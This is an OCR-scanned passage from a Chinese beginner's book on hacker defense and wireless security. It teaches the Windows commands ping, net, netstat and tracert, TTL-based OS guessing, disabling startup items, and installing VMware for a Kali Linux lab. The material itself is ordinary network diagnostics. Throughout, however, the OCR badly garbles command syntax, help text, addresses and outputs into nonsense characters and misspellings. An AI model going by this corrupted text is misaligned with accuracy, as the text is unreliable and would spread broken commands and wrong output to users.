ping 命 令 是 第 一 个 必须 掌握 的 DOS 命 令 。 在 
“命令 提示 符 ” 窗 口中 输入 ping /?， 可 以 得 
到 这 条 命令 的 帮助 信息 。 


Microsoft Windows [个 本 10. 0. 17763. 104] A 


cy 2018 Nicrosoft Corpcoration。 保 留 记 有 权利 。 
C:\Users\Acministrator>pins 1 
用 法 : ping [-t] [-a] [-n count] [-1 size] [-f] [-i TTL] [-v TOS] 
[-r count] [-s count] [[-j host-list] | [-k host-list]] 
[-w timeout] [-R] [-3 srcaddr] [-c compartment] [-p] 
[-4] [-6 target_ name 
先世 : 
人 ping 指 记 的 主机 , 育 到 入 上 
要 人 兴 提 作 ， 请 键入 Ctrl+Ereak; 
宁 1 
- 了 地址 解析 为 主机 各。 
count 可 i 
= 上 312e 1 Je 
-t i 下 Bol “不 分 段 ” 标记 ( 仅 适 用 于 IPw4) 
Sy 、 疡 
-7 TOS 服务 关 型 ( 仅 适 用 于 IPyd4。 该 设 弃 用 
| 直 关中 全 服务 甘 台 区 抽 证 和 
a 记录 计 闪 其 的 路 自修 这 蜂王 IP IPv4)。 
-s count 计 煞 跃 所 的 时 间 答 5 有 这 用 于 IPwvd) 
-j host-list ”与 主机 而 es 松散 源 路 由 ( 侈 话 用 于 _IPvd) 。 
-k host-list 机 Gt 0 用 中 (站 扶 多 上 ( 似 凑 用 于 IPvd4) ， 
-wt t 6 "|! 
下 “局 料 全 用 站 囊 半 闫 泊 地 人 《人 适用 于 TIPwg) 
据 好 C5095， 己 齐 用 由 纵 由 标 头 。 
信用 上 六， 于 及 
i 
-3 srcaddr 受信 由 的 夭 地址， 
| 中 a 下 网络 店 拟 化 提供 程序 地 址 ， 
-6 哩 | pp 
C:\Users\Acmini strator> 


使 用 ping 命 令 对 计算 机 的 连接 状态 进行 
测试 的 具体 操作 步骤 如 下 。 
使 用 ping 命 令 来 判断 计算 机 的 操作 
系统 类 型 。 在 “命令 提示 符 ” 窗 口中 输 
入 “192.168.0.1” 命 令 ， 右 上 图 为 其 运行 
结果 。 
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留 所 有 权利 。 


让 本 
ce] 2018 Jicrosoft Corporation。 保留 


F: \Users\Administrator>ping 192. 158.0.1 
bing 192. 168, 0. 1 果 有 织 有 字 闻 让 牛 册 x 据 : 
-32 了 和 由 -ng TTL=64 


: 


192. 168.0.1 的 ,Pine -统计 信息 ; 


己 三 = 【 ), 
往返 他 入 证 人 邮包 各 尖 和 7 4， 丢 夫 = 0 (0% 和 去 失 
， 平 均 = lms 


C:VUserswAdministrator>e 


1 168.0.1 - 站 a 
主机 发 出 大 量 的 数据 包 ， ey 


Jicrosoft Windows [本 10.0, 17763.104] A 
(Cc) 2018 JG crzosoft Corporation。 保 留 所 有 权利 。 


C:\Users\Administratorypine 192. 168, 0.1 -t -1 128 


| 正在 Ping 192. 168, 0.1 具有 128 字 节 的 数据 : 

. 168.0. 1 的 回复 : 字 节 =128 时 间 <lms TTL=64 
上 192. 168. 0. 1 的 回复 : 字 节 =128 时 加 <lms TTL=64 
来 目 192. 168.0. 1 的 回复 : 字 节 =128 时 间 <lms TTL=64 
来 目 192. 168.0. 1 的 回复 : 字 节 =128 时 回 <lms TTL=64 
来 目 192. 168.0.1 的 回复 : 字 节 = | 邮 c TTL=64 
来 目 192. 168.0.1 的 回复 : 字 节 =128 时 国 <lms TTL=64 
环 目 192. 168.0.1 的 回复 : 字 节 =128 时 则 <lms TTL=64 
上 192. 168.0. 1 邱 回 复 : 字 芒 =128 时 间 =lms TTL=64 
来 目 192. 168. 0. 1 后 回复 : 字 节 =128 时 间 =lmes TTL=64 
水 目 192. 168.0.1 的 回复 : 字 节 = js TTL=64 
来 目 192. 168.0.1 的 回复 : 字 节 =128 时 间 =lms TTL=64 


ep] 判断 本 台 
通 。 在 “命令 提示 符 ” 窗 


计算 机 是 否 与 外 界 网 络 连 
窗口 中 输入 ping Www. 


baidu.com 命 令 ， 下 图 为 其 运行 结果 ， 说 明 本 


[ 台 计 算 机 与 外 界 网 络 连 通 


Microsoft Windows LI 本 10.0.17763. 104 ~ 
(o? 2018 Microsoft Corporation。 和 保留 所 有 想 利 。 


Fc: “Users\AdministratorYpine ww. baidu,. com 


时 在 F ng www, a shi fen, com [220.191, 112, 244] 具有 32 字 节 的 数据 : 
自 220. 181, 112. 244 的 加 : 字 节 =32 时 人间 =65ms TIL=55 

自 220. 181. 112. 244 站 : 宇 节 =32 时 加 =65ms TTL=55 

= 220. 191, 112. 244 


: 工 了 = =32 提 
220. 181, 112. 244 


(=65ms TTL=55 
: 字 节 =32 所 


J |8|=S5ms TTL=55 


P20 站 丰 寺 2 台 各 仿 Eis 多 六 信息 。 三 类 - 0 (ow 丢失 )， 
返 人 时 是 (以 ); 
全 时 Filia tn 的 


c: '\Users\Mdministrator>s 


解析 某 IP 地 址 的 计算 机 名 。 在 “ 命 
FA 符 ” 窗 口中 输入 ping -a 192.168.1. 
102 命 令 ， 下 图 为 其 运行 结果 ， 这 人 台 主 
机 的 名 称 为 “SC-201811151232.DHCP 
HOST”。 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


icros LhR 本 
[cy 2018 Wicrosoft Corporatit Dr, 保留 有 所 有 权 和 刑 。 


MUssrsAdministrator>ping -a 192. 168.0. 143 


92. 163.0. 14 复 ， 字 节 宇 市 =32 上 站 cims Tc128 

自 192. 163.0. 143 入: 32 轩 [B]<lrs TTL=128 

有 | 中 a 
IE 

192. 168. 0. 143 的 Ring 小 


i 


Be 4， 于 和 失 = 0 (0% 丢失 )， 


CP:\Users\Administrator> 


Caan 


利用 TTL 值 判断 操作 系统 类 型 
由 于 不 同 的 操作 系统 的 主机 设置 的 
TTL 值 是 不 同 的 ， 所 以 可 以 根据 TTL 值 来 
识别 操作 系统 类 型 。 在 一 般 情况 下 : 
e@ TTL=32 则 认为 目标 主机 操作 系统 为 
Windows 95/98。 
e@ TTL=64-128 就 认为 主机 操作 系统 为 
Windows NT/2000/XP/7/10。 
e@ TIL=128-255 或 者 32-64 就 认为 主机 
操作 系统 是 UNIX/Linux 操 作 系 统 。 


net 命 令 
使 用 net 命 令 可 以 查询 网 络 状 态 、 共 享 
资源 以 及 计算 机 所 开启 的 服务 等 ， 该 命令 
的 语法 格式 信息 如 下 : 
NET [ ACCOUNTS | COMPUTER | CONFIG | 
CONTINUE TI ETLENI GROUP NI HELETI| 
HELPMSG | LOCALGROUP | 
PAUSE | PRINT | SEND | SESSION | 


SHARE | START | STATISTICS | STOP 
| TIME | USE | USER | VIEW | 


查询 本 台 计 算 机 开启 那些 Windows 服 务 
的 具体 操作 步骤 如 下 。 
使 用 net 命 令 查看 网 络 状态 。 打 开 
“命令 提示 符 ” 窗 口 ， 在 命令 行 下 输入 net 
start 命 令 ， 如 下 图 所 示 。 


NAME | 


10.0. 17753. 104] ~ 


icrosoft Windows [hf 


te) 2018 Microsoft Core ere bianis 保留 所 有 权利 。 


Cc:\Users\Administrator>net starte 


按 Enter 键 ， 则 可 以 在 打开 的 “命令 提 
有 ”窗口 中 显示 计算 机 所 局 动 的 Windows 
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服务 ， 如 下 图 所 示 。 


stem32\cmd.exe 


10. 0. 17763. 104] ^ 
(ec) 2018 Microsoft Corporation。 悍 留 所 有 权 逢 |。 


台 ee rn et eb not start 


经 启动 以 下 好 ndows 服务 : 


AdaptiveSleepService 

AND External Events Utility 
AD FUEL Service 
Mpplication lntormation 
AppX Deployment Service (AppXoVC) 
Background Tasks Infrastructure Service 
Base Filtering Ensine 
cbaqdhsvc_p0bf2 

CDPUserSvc_50bf2 

CNG Key Isolatlon 

CON+ Event System 

Computer Browser 

Corellessaging 

Credential Manager 

Cryptographic Services 

DCONM Server Process Launcher 
Device Association Service 

DHCP Client 

DNS Client 

Flash Helper Service 

Function Discovery Provider Host 


2.6.5 “netstat 命令 


netstat 命 令 主 要 用 来 显示 网 络 连接 的 信 
息 ， 包 括 显示 活动 的 TCP 连 接 、 路 由 器 和 网 
络 接口 信息 ， 是 一 个 监控 TCP/IP 网 络 非常 
有 用 的 工具 ， 可 以 让 用 户 得 知 系统 中 目前 
都 有 哪些 网 络 连接 正常 。 

在 “命令 提示 和 从 ”窗口 中 输入 netstat 
/?， 可 以 得 到 这 条 命令 的 帮助 信息 。 


cro ndows [这 本 天 四 1 1 六 10 入 
Cc) 38 ct rosoft Corboration。 保 留 所 有 公 利 。 


FIADsercsA st 
屁 示 协议 统计 导 息 和 当前 TCP/AIP 网 络 连 按 。 
WETSTAT [-a] [-h] [-e] [-#] [-n] [-o] [-p proto] [-r] 
-a 34 和 全 
-b 口 时 读 咏 

人 让 es 
攻守 肆 吕 人 六 4 
J 和 
有 
ea 此 选项 可 以 与 -s 选 顶 
村 


ualur rtstal /9 


[-=】 [-x] [-+] [interval] 


a 


-ff 


= a 人 
二 proto A i i 8 
ICP、IUP、TCFPv6 或 现 
站 显示 每 个 协议 的 统计 信息， 人 全: 


yd 


FE 纺 冲 
i TCP ds i 关口 


计 村 站 了 的 梳 计 信和 二 认 从 识 下 . 
ICNP、 ICHE 着， ~ CP. TCPv6、UDP 和 UDP*6 的 统计 信息 


Ee, 


J work[irect 广 控 、 信 昨 器 和 共 蛙 


Ee 人 
和 人 上 


该 命令 的 语法 格式 信 恩 如 下 : 


NETSTAT [-a]l [-b] 
| es | i 


其 中 比较 重要 的 参数 含义 如 下 : 

e -a: 显示 所 有 连接 和 监听 端口 。 

以 数字 形式 显示 地 址 和 端口 号 。 
使 用 netstat 命 令 查 看 网 络 连 接 的 具体 步 


ene my 


[intervall 


Bes 3 MO, 


@ -ln: 


打开 “命令 提示 符 ” 窗口 ， 在 其 中 输 
本 n 或 netstat 命 令 ， 按 Enter 键 ， 即 可 查 


看 服务 器 


活动 的 TCP/IP 连 接 ， 如 下 图 所 示 。 


n32\cmd.exe - netstat 


10.0. 17763. 104] ~ 


-pp Vindows | 


在 “命令 提示 符 ” 窗 口中 输入 netstat 一 
和 按 Enter 键 ， 即 可 查看 本 机 路 由 信息 
内 容 ， 如 下 图 所 示 。 


(s) 2018 Microsoft Corparation。 保留 所 有 权利 。 


:\Users\Aainistratlor nelstal -r 


(fc) 2018 Microsoft Corporation。 怀 留 所 有 权利 ， 
C:\Users\Administratcr>netstat 
活动 连接 
协 说 ”本 地 地 站 外 部 地 址 状态 
TCP 127. 0.0.1:21503 activate:49778 ESTABLISHED 
TeP 127. 0D.D. 1:45676 activate:d9677 ESTABLISHED 
TCR 127. 0.D. 1:49677 activate:;d9676 ESTABLISHED 
TEP 127. 0.0.1:490778 activate:2l1803 ESTARLISHED 
TCP 192. 168. 0. 143:49928 180. 101. 139, 92 :http CLOSE_¥AIT 
ITCP 192. 168. 0. 143 :49929 180. 101. 139, 92 :http CLOSE_Y¥YAIT 
TCP 192. 168. 0. 143:50772 52. 230.3.194:https ESTABLISHED 
TCP 192. 168. 0. 1d3:50971 113. 96. 209. 106:httr ESTABLISHED 
[| 


ff #6 bD d8 dé4. .. TAP-Wndrwe Adaptar V9 
25 20 £9 5f 和...... Realtek PCIe (PE Fanily Ccntroller 
| Softmare Loopback lnterface 1 
IPw 和 4 跨 由 去 
直销 自 : 
网 给 日 林 网 络 拓 码 网 关 接口 ”路 点 豆 
0.0.0.0 0n0, 和 0 192, 163.0, 1 192, 163. 0, 143 35 
127, 00.0 255, 0, 0.0 迹 距 上 127.0.0.1 331 
127. 0.0.1 255. 255. 255, 255 127. 0. 0. 1 331 
127, 255 255. 255 255, i. er 127.0.0.1 331 
192. 163. 0. 0 255. 192. 163.0. 143 291 
192. 168. 0. 143 255> 255 2 255 192. 163. 0. 143 291 
192 168.0.255 255. 255. 255. 255 192 163 0. 143 291 
224.0.0.0 240, 0.0.0 127.0. 0. 1 331 
294.0.0.0 ?3400.00.00 1909 16% 0. 143 291 


255, 255. 255. 255 255. 255. 255. 255 127.0.0.1 331 
255. hh 55 5 255. 255. 255 197 15 0. 143 291 


5 291 fs80: ;64 6 
.201 #080::a19e:9941:7000: 0184/128 


1 331 £00::/8 
5 291 £100::/8 在 名 路 上 


在 “命令 提示 符 ” 窗 口中 输入 netstat 一 
Ee 按 Enter 键 ， 即 可 查看 本 机 所 有 活动 
的 TCP/IP 连 接 ， 如 下 图 所 示 。 


~ 管理 瑟 ; CANWindow ter md,exe - netstat -a 口 
icrosoft Yindows [中 本 10.0. 17763. 104 内 

(c) 2018 了 icrosoft Corporaticn。 保 留 所 有 检 利 。 

CADsersWAaministratcor>netstat -a 

活动 连接 
协议 ”本 地 地 址 外 部 地 址 状态 
TCP 0.0.0.0:135 Sc-201811151232:0 LISTENING 
TCP D0. 0.0.0:443 sc-201811151232:0 LISTENING 
TCP 0.0. 0. 0:445 sc-201811151232:0 LISTENING 
TCP 0. 0. 0. 0:902 sc-201811151232:0 LISTENING 
ICP 0. 0.0.0:912 SC-20181115123230 LLSTENING 
TCP 0. 0. 0. 0:3306 sc-201811151232:0 LISTENING 
TCP DO. 0. 0. 0:5040 5c-201811151232:0 LILSTENING 
TCP 0. 0. 0. 0:5357 sc-201811151232:0 LISTENING 
TCP 0.0. 0. 0:7909 5c-201811151232:0 LLSTENING 
TCP D0.0.0.0:10143 sc-201811151232:0 LISTENINC 
TCP 0. 0. 0. 0:33060 sc-201811151232:0 LISTENING 
TOP 0D. 0. 0. 0:49664 5c-201811151232:0 LILSTENING 
TCP 0. 0. 0. 0:49665 SC-20181115123230 LISTENING 
ICP UD. 0. 0. UV:49666 5c-201811151232:0 LLSTENING 
TCP 0. 0. 0. 0: 49667 SC -20181115123230 LISTENINC 
ICP 0. 0. 0. 0:49669 SC-20181115123230 LILSTENING 
TCP 0. 0. 0. 0: 49673 SC -2018111512323:0 LISTENINC 
TP 0D. 0.0.0:49698 3C-201811151232:0 LILSTENINGE 
TOP 127. 0. 0. 1:5037 3C-201811151232:0 LILSTENINGE 
TP 127.0.0. 1:8307 St-201811151232:0 LISTENING 
TP 127.0.0. 1:21440 SC-2018111l5123220 LISTENINC 
TCF 127.0.0. 1:21441 3C-201811151232:0 LILSTENING 
TP 127.0.0. 1;21501 SC-20181115123220 LILSTENING 
TP 127. 0. 0. 1:21503 3C-201811151232:0 LILSTENING 
TP 127.0.0. 1:21508 activate: dd9778 ESTABLISEED 
TP 127. 0.0. 1:28317 5c-201811151232:0 LILSTENING 
TP 127.0.0. 1:49676 activate: 49677 ESTABLISEED 
TP 127. 0.0. 1:49677 activate:d9676 ESTABLISHED 
TCP 127. 0.0. 1:49778 activate:21503 ESTABLISEED 
TP 192. 168. 0. 143; 139 sc-201811151232:0 LISTENING 
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在 “命令 提示 符 ” 窗 口中 输入 netstat 
_n -a 命令 ， 按 Enter 键 ， 即 可 显示 本 机 所 有 
连接 的 端口 及 其 状态 ， 如 下 图 所 示 。 


“管理 内 LAW yStemoe U.SXe 口 

icrosoft Windows [I 本 10,0,17763, 104 ~ 
(c) 2018 Microsoft Corporatione 所 有 权 刊 。 
Cb:\Users\Administratornetstat -n -a 
活动 连接 

协 说 ”本 地 地 址 外 部 地 址 状态 

TCP 0.0.0.0;135 0.0.0.0:0 LISTENING 

TEP -0.0.0.0:443 0.0.0.0:0 LISTENING 

TeP 0.0,0.D; 445 0.0.0,0:0 LISTENING 

TP -0.0,0.0:902 0. 0.0,0:0 LISTENING 

TP -0.0.0.0:912 0.0.0.0:0 LISTENING 

Tap -0.0.0.0:3306 0.0.0.0:0 LISTENING 

Te -0,0,0,0:5040 0. 0.0,0:0 LISTENING 

TOP -0.0.,0.0:5357 0.0.0,0:0 LISTENING 

Tap -0.0.0.0:7909 0.0.0.0:0 LISTENING 

JEP 0,0,0,0;10143 0. 0.0,0:0 LISTENING 

TCP -0.0,0.0:33060 0.0.0,0:0 LISTENING 

Top -0.0.0.0:45664 0.0.0.0:0 LISTENING 

Tep 0.0.0.0:349665 0.0.0.0:0 LISTENING 

JECP -0.0,0.,0:49666 0.0.0,0:0 LISTENING 

TP -0.0.0.0:49667 0.0.0.0:0 LISTENING 

Top -0.0.0.0:45689 0.0.0.0:0 LISTENING 

TP -0.0,0,0;49673 0. 0.0,0:0 LISTENING 

TCP -0.0.0.0:49693 0.0.0.0:0 LISTENING 

TCP 127.0.0.1:5037 0.0.0.0:0 LISTENING 

TeP 127, 0. 0. 1:;8307 0.0.0,0:0 LISTENING v 


2.6.6 ”tracert 命 令 


使 用 tracert 命 令 可 以 查看 网 络 中 路 由 外 
节点 信息 ， 最 常见 的 使 用 方法 是 在 tracert 命 
令 后 退 加 一 个 参数 ， 表 示 检 测 和 查看 连接 
当前 主机 经 历 了 哪些 路 由 节点 ， 适 合用 于 
大 型 网 络 的 测试 ， 该 命令 的 语法 格式 信息 
如 下 : 


tracert [-d] [-h MaximumHops] 


Hostlist] [-w Timeout] [IargetName |] 


其 中 各 个 参数 的 含义 如 下 : 
e -d: 防止 解析 目标 主机 的 名 字 ， 可 
以 加 速 显 示 tracert 命 令 结果 。 
e -h MaximumHops: 指定 搜索 到 目标 
地 址 的 最 大 跳跃 数 ， 默 认 值 为 30 个 
跳跃 点 。 
© -] Hostlist: 
释放 源 路 由 。 
e -w Timeout: 指定 超时 时 间 间 隔 ， 默 
认 单 位 为 ms。 
e TargetName: 指定 目标 计算 机 。 
例如 : 如 果 想 查看 www.baidu.com 的 
路 由 与 局 域 网 络 连接 情况 ， 则 在 “命令 提 
示 符 ”窗口 中 输入 tracert www.baidu.com 
命令 ， 按 Enter 键 ， 下 图 为 其 显示 结果 。 


了 


按照 主机 列表 中 的 地 址 


2 


黑客 攻防 与 无 线 妇 全 从 新 手 到 高 手 〈《 超 值 版 ) 


四 过 最 多 30 个 跃 点 跟踪 
wy a, shifen. com [220. 181. 112. 244] 的 路 由 : 


《1 里 种 192. 169. 0.1 

40 ms 172. 16.0.1 
222. 83. 34. 121 
222. 83. 40. 233 
202. 97. 38. 13 


人 朋 站 “|o 

220. 181. 16. 121 
1 玉 超 时。 

220. 起 182. 38 
I “|: 

请 求 超时、 

请 求 超 时 ， 

220. 181. 112. 244 


1 
2 
了 
二 
5 
6 
7 
9 
9 


:Users\Adrinistrator> 


2.7 ”实战 演练 


实战 演练 1 一 一 显示 文件 的 后 缀 扩展 名 


Windows 10 系 统 默认 情况 下 并 不 显示 
文件 的 扩展 名 ， 用 户 可 以 通过 设置 显示 文 
件 的 扩展 名 。 有 具体 操作 步骤 如 下 。 

单 击 “ 开 始 ” 按 钮 ， 在 弹出 快捷 菜 
单 中 选择 “文件 资源 管理 器 ”选项 ， 打 开 
“文件 资源 管理 器 ”窗口 ， 如 下 图 所 示 。 


= ”文件 资源 管理 巧 
音 专 


”~ 党 用 文件 去 (8) 


[step 图 选择 “查看 ”选项 卡 ， 在 打开 的 功能 
区 域 中 选中 “显示 /隐藏 ”区 域 的 “文件 扩 
展 名 ” 复 选 框 ， 如 下 图 所 示 。 


口 ] 项 目 复 迁 村 国 


ed sia) AR 
的 项 目 所 迁 项 目 


{各 OneDrve 
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此 时 打开 一 个 文件 夹 ， 用 户 便 可 以 查 
看 到 文件 的 扩展 名 ， 如 下 图 所 示 。 


二 快速 访问 名 称 | 泛 改 日 轩 
[| Tencent Files 

门 自 定义 Office 档 板 
ES ipmsg.log 


2016/1/14 11:22 
2016/1/6 17:34 
2016/1/9 12:08 


咱 加 和 
- 才 
钊 

友 为 为 轧 


| 关节 
| 新 手 学 电脑 以 入 门 到 炉 到 ( W 
(入 OneDrive 


国 此 电 胺 

午 视 上 二 

二 | 习 片 YY < > 
3 个 项 目 。 迁 中 1 个 项 目 340 闻 节 匡 划 


实战 演练 2 一 一 关闭 开机 多 余 局 动 项 目 
在 计算 机 启动 的 过 程 中 ， 自 动 运行 的 

程序 叫 作 开机 启动 项 ， 有 时 一 些 木 马 病 毒 

程序 会 在 开机 时 就 运行 ， 用 户 可 以 通过 关 

闭 开 机 局 动 项 目 来 提高 系统 安全 。 
具体 的 操作 步骤 如 下 。 

按键 盘 上 的 Ctrl+Alt+Del 组 合 键 ， 打 

开 “ 任 务 管理 器 ”界面 ， 如 下 图 所 示 。 


单 击 “任务 管理 器 ”选项 ， 打 开 “ 任 
务 管 理 器 ”窗口 ， 如 下 图 所 示 。 


| 闻 任 各 管理 器 = x 
文件 (PF 选项 [O) ”过 春 (V) 
进程 性 能 应 用 历 穴 记录 启动 ”月 户 ”详细 信息 服务 
站 11% 58% 0% 0% 
和 名称 CPU 内 存 人 党 盘 网 阁 
| 和 i | Sd | 
应 用 (4) 
” 息 350 安 全 浏览 天 0 Mbps 
Microsoft Word D Mbps 
司 Windows 资源 答 理 颖 (3) 0 Mbps 
， 呈 作 和 管理 器 0 Mbps 
后 台 进 程 (41) 
不 360 安 全 济 总 壬 0 Mbps 
谍 350 安 全 浏览 器 0 Mbps 
息 360 安 全 浏览 强 0 Mbps 
咎 3650 安 全 剂 具 强 0 Mbps 
苇 350 安 全 浏览 强 0OMbps vy 
( 八 ) 简 咯 信息 (D) 结束 任务 介 


第 2 章 “无线 网 络 攻防 必 备 知识 一 


[step 图 选择 “启动 ”选项 卡 ， 进 入 “启动 ” | 加 任务 管理 器 - 0O Xx 
> lp > 文 运 项 (O) ”但 三 

界面 ， 在 其 中 可 以 看 到 系统 当中 的 已 启用 | | 

启动 项 列表 ， 如 下 图 所 示 。 


名 称 发 布 者 状态 记 动 影响 
同人 斤 壮 0 x ， 国 360 安 全 卫士 安全 防护 中 心 .。 360.cn 已 启用 受 
文件 (月 ”选项 (0O) 坦 看 (V) 强 Brindicator Brother Industries, Ltd， 已 启用 二 
进程 性 能 应 用 历史 记录 启动 用 户 详细 信息 服务 苹 CTF 加 载 租 序 Microsoft Corporation 已 启用 低 
和 和 人 ^ 省 Us 证 动 彩 响 本 Microsoft OneDrive Microsoft Corporation 高 
国 360 安 全 卫士 安全 防护 中 心 。 360.cn 已 启用 Status Monitor Application Brother Industries, Ltd， 已 启用 对 
到 Brlndicator Brother Industries, Ltd. 已 启用 二 
芯 CTF 加 工程 序 Micrcsoft Corporation ”已 启用 低 
抱 Microsoft OneDrive Micrcsoft Corporation ”已 启用 高 
Status Monitor Application “Brother Industries, Ltd. 已 启用 二 
从) 简略 信息 (D) 


简 咯 信息 (D) 禁用 (A) 2.8 小 试 届 于 
选择 开机 启动 项 列表 框 中 需要 禁用 的 练习 1: 查询 JP 地址 。 


启动 项 ， 单 击 “ 禁 用 ”按钮 ， 即 可 禁用 该 练习 2: 查看 系统 开放 的 端口 。 
启动 项 ， 如 下 图 所 示 。 练习 3: 黑客 弟 用 攻击 命令 演练 。 


| 


第 3 章 ”搭建 无 线 测试 系统 


Kall Linux 


无 线 技术 在 给 人 们 带 来 极 大 方便 的 同时 ， 也 带 来 了 极 大 的 信息 
家 庭 用 户 ， 安 全 意识 依然 薄弱 。 本 草 介 绍 无 线 测试 系统 环 境 的 搭建 ， 


论 是 企 事业 单位 还 是 


:安全 风险 。 在 目前 ， 无 


主要 内 容 包 括 安 装 与 创建 虚拟 机 、 安 装 与 更 新 Kali Linux 操 作 系 统 、 安 装 CDlinux 系 统 、 安 


装 与 使 用 靶 机 等 。 


3.1 安装 与 创建 虚拟 机 


对 于 无 线 安 全 初学 者 ， 使 用 虚拟 机 构建 
无 线 测 试 环境 是 一 个 非常 好 的 选择 ， 这 样 既 
可 以 快速 搭建 测试 环境 ， 同 时 还 可 以 快速 还 
原 之 前 快照 ， 避 免 错误 操作 造成 系统 月 演 。 


下 载 虚 拟 机 软件 
虚拟 机 使 用 之 前 ， 需 要 从 官网 下 载 虚拟 


”机 软件 wmware， 具 体 的 操作 步骤 如 下 ， 


使 用 浏览 器 打开 虚拟 机 官方 网 站 


https://my.vmware.com/cn， 进 入 虚拟 机 官网 
页 面 ， 如 下 图 所 示 。 


MY NWare 


后 ， 进 入 所 有 下 载 页 面 ， 并 切换 到 “所 有 
品 ” 选 项 卡 ， 如 下 图 所 示 。 


所 有 下 载 


和 的 产 品 产品 列表 CA 和 到 Z) 


在 下 拉 页 面 找到 VMware Workstation 


Pro 对 应 选项 ， 单 击 右 侧 的 “查看 下 载 组 
件 ” 超 链接 ， 如 下 图 所 示 。 
Rs 
进入 VMware 下 载 页 面 ， 在 其 中 选择 
Windows 版 本 ， 单 击 右 侧 “ 转 至 下 载 ” 超 链 
接 ， 如 下 图 所 示 。 


Ed 驱动 程序 和 工 且 开源 人 及 EX 150 


VMware Workstation Pro 


YY VMware Workstation Pro 14.13 for Windows 


VMware Workstation 14.1.3 Pro for Windows 2018-08-14 转 至 下 载 


YY VMware Workstation Pro 14.1.3 for Linux 


VMware Work 2018-08-14 转译 下 坦 


a 面 ， ， 单 二 “立即 下 载 ” 
re 如 下 图 所 示 。 


| PT | 下 >。 驱动 程序 和 工 只 开源 代码 自 十 义 1SO 


文件 信息 


This Workstation product installation includes VMware 
Tools for Windows 64-bit operating systems. 
文件 太 小 - 487.09 MB 


了 部 更 和 信息 


3.1.2 ”安装 虚拟 机 软件 


虚拟 机 软件 下 载 完 成 后 ， 接 下 来 
就 可 以 安装 虚拟 机 软件 了 ， 这 里 下 载 
的 是 目前 最 新 版 本 “VMware-worksta- 
tion-full-14.1.2-9474260.exe”， 用 户 可 根据 
实际 情况 选择 当前 最 新 版 本 下 载 即 可 ， 安 
装 虚 拟 机 的 具体 操作 步骤 如 下 : 
双击 下 载 的 VMware 安装 软件 ， 进 入 

“欢迎 使 用 VMware Workstation Pro” 窗 


口 ， 如 下 图 所 示 。 


湖 VMware Workstation Pro 安装 一 XxX 
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WORKSTATION 装 店 4 he 。 
Ts 


N 


鸡 戏 使 用 VMware Workstation Pro 安装 向 导 


4 


版 要 所 有 028.2018 years nc 保 所 有 权利 < 柱 疡 呈 
过 美国 和 国际 版 权 及 知识 产权 法 保护 。VMware 产品 获得 
及 下 中 全 四 的 织 吕 光 扣 寺 和 


http: //www ,vmware. 


取消 


单 击 “下 一 步 ” 按钮 ， 讲 入 ¢ 最 终 终 用 
户 许可 协议 ”窗口 ， 选 中 “我 接收 许可 协 
议 中 的 条 款 ” 复 选 框 ， 如 下 图 所 示 。 


攻 VMware Workstation Pro 去 装 XxX 


最 作用 户 许可 协议 
请 仔细 阅读 以 下 许可 协议 。 


VMWARE 最 终 用 户 许可 协议 


请 注意 ， 在 本 软件 的 安装 过 程 中 无 论 可 能 会 出 现任 何 条 款 ， 
使 用 本 软件 部 将 爱 此 最 终 用 户 许可 协议 各 条 款 的 约束 。 


重要 信息 ， 请 仔细 阅读 ， 您 一 旦 下 载 、 安 装 或 使 用 本 软件 ， 
您 〔 自 然 人 或 法 人 ) 即 同意 接受 本 最 终 用 户 许可 协议 〔“ 本 
协议 ”) 的 约束 。 如 果 您 个 同意 本 协议 的 未 款 ， 请 义 小 载 、 
安装 或 使 用 本 软件 ， 您 必须 肌 除 东软 件 ， 或 在 三 (30) 开 > 


回 我 接受 许可 协议 中 的 条 未 多 


打印 人 ) 


上 一步 加 取消 


单 击 “下 一 步 ” 按 钮 ， 进 入 “ iy 
Fry 口 ， 在 其 中 可 以 更 改 安 装 路 径 
可 以 保持 默认 ， 如 下 图 所 示 。 


鞠 VMware Workstation pro 安装 一 X 
自 定义 安装 
选择 安装 目标 及 任何 其 他 功能 。 
安装 位 置 : 
D:\Program Files (x86)\VMware\ 更 改 .… 


口 ] 增强 型 键盘 驱动 程序 (需要 重新 引导 以 使 用 此 功能 但) 
此 功能 要 求 主机 驱动 器 上 具有 10MB 空间 。 


上 一 步 (6) [下 一 步 (v) | 取消 
单 击 “ 下 一 步 ” 按 钮 ， 进 入 “用 户 体 


as 口 ， 这 里 采用 系统 默认 设置 ， 
如 右上 图 所 示 。 
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类 VMware Workstation Pro 安装 一 xX 


用 户 体验 设置 EE 


编辑 默认 设置 以 提高 您 的 用 户 体 验 。 


名 Ee 
Ee orkstation Pro 启动 时 ， 检 查 应 用 程序 和 已 安装 软件 组 件 是 否 有 


回 加 入 VMware 客户 体验 改进 计划 中 


VMware 客户 体验 提升 计划 (CEIP) 将 向 VMware 提供 相 ^ 
关 人 信息， 以 帮助 VMware 改进 产品 和 服务 、 解 决 问 

题 、 并 向 您 建议 如 何以 最 佳 方式 部 署 和 使 用 我 们 的 产 
品 。 作 为 CEIP 的 一 部 分 ，VMware 会 定期 收集 和 您 所 


持 有 的 VMware 密 钥 相关 的 使 用 VMware 产品 和 服务 的 v 
了 解 重 多 信息 


上 一 步 6) [下 一 步 (Y | 取消 
ee “下 一 步 ” 按 钮 ， 进 入 “快捷 


口 ， 在 其 中 可 以 创建 用 户 快捷 
方式 ， 这 里 可 以 保持 默认 设置 ， 如 下 图 
所 示 。 

扰 VMware Workstation Pro 去 装 一 X 
快捷 方式 

选择 您 要 放 入 系统 的 快捷 方式 。 EE 


在 以 下 位 置 创建 YMware Workstation Pro 的 快捷 方式 : 
加 点 面 D) 
四 开始 菜单 程序 文件 来 (3) 


上 一 步 6) 取消 


单 击 “ 下 一 步 ” 按 钮 ， 进 入 “已 准备 
好 安装 VMware workstation Pro” 页 面 ， 开 
始 准备 安装 虚拟 机 软件 ， 如 下 图 所 示 。 


由 VMware Workstation Pro 玄 装 一 X 


ene 。 单 击 ` 上 一 步 查看 或 更 改 任何 安装 设置 。 单 击 ` 取 消退 出 向 


已 准备 好 安装 VMware Workstation Pro 


上 一 步 @) 安装 人 0 取消 
单 击 “ 安 某 ” 按 钮 ， 等 待 一 段 时 间 后 


29 


搭建 无 线 测试 系统 Kali LinuX 和 和 和 于 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


虚拟 机 便 可 以 安装 完成 ， 并 进入 ns dee EE. 
workstation Pro 安 装 向 寻 已 完成 ” ， 单 
击 “ 完 成 ”按钮 ， 关 闭 ea 
如 下 图 所 示 。 
